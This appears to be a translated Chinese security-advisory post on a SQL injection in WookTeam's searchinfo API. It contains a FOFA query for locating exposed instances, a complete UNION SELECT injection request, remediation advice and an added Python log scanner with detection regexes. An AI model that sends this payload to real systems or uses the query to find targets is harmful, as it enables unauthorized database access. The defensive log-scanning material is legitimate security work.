Product Introduction
Vulnerability Threat
Vulnerable Environment
FOFA:
title="Wookteam"
Vulnerability Reproduction
PoC
GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2CMD5%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
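Query
Batch Verification Script
The Nuclei verification script has been published
Remediation Recommendations
Remove the Internet-facing exposure or restrict access to the interface
Upgrade to a secure version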
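Until the upgrade is in place, web access logs can be checked for requests shaped like the PoC above. The following is an added example, not part of the original post or of WookTeam: it URL-decodes the where[...] parameters sent to /api/users/searchinfo and flags values that break out of the quoted string. The log format, sample lines and rule names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/api/users/searchinfo"  # path taken from the PoC request
# Assumed log layout: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Heuristics for the shape of the PoC value; rule names are hypothetical.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("quote-breakout", re.compile(r"['\"]\s*\)")),
    ("trailing-comment", re.compile(r"(?:#|--)\s*$")),
]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] '
    '"GET /api/users/searchinfo?where[username]=O%27Brien HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2025:10:00:02 +0000] '
    '"GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CNULL%23 HTTP/1.1" 200 733',
    '198.51.100.4 - - [01/Jan/2025:10:00:03 +0000] '
    '"GET /api/users/searchinfo?where%5Busername%5D=1%27%29%20union%20all%20select%20NULL%23 HTTP/1.1" 200 733',
    '203.0.113.7 - - [01/Jan/2025:10:00:04 +0000] '
    '"GET /api/project/lists?page=1 HTTP/1.1" 200 90',
]

def scan(lines):
    """Return (client_ip, parameter, matched_rules) for suspicious requests."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m.group("target"))
        if url.path.rstrip("/") != ENDPOINT:
            continue
        # parse_qsl decodes %XX and '+', so encoded keys and values are normalised.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if not key.startswith("where["):
                continue
            hits = [name for name, rx in RULES if rx.search(value)]
            if hits:
                findings.append((m.group("ip"), key, hits))
    return findings

if __name__ == "__main__":
    for ip, key, hits in scan(SAMPLE_LOG):
        print(f"{ip} {key} -> {', '.join(hits)}")
```

A benign value containing an apostrophe (the first sample line) is not flagged, because no rule fires on a lone quote.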
Originally published on the WeChat official account 冷漠安全: 「Vulnerability Reproduction」 WookTeam searchinfo SQL Injection Vulnerability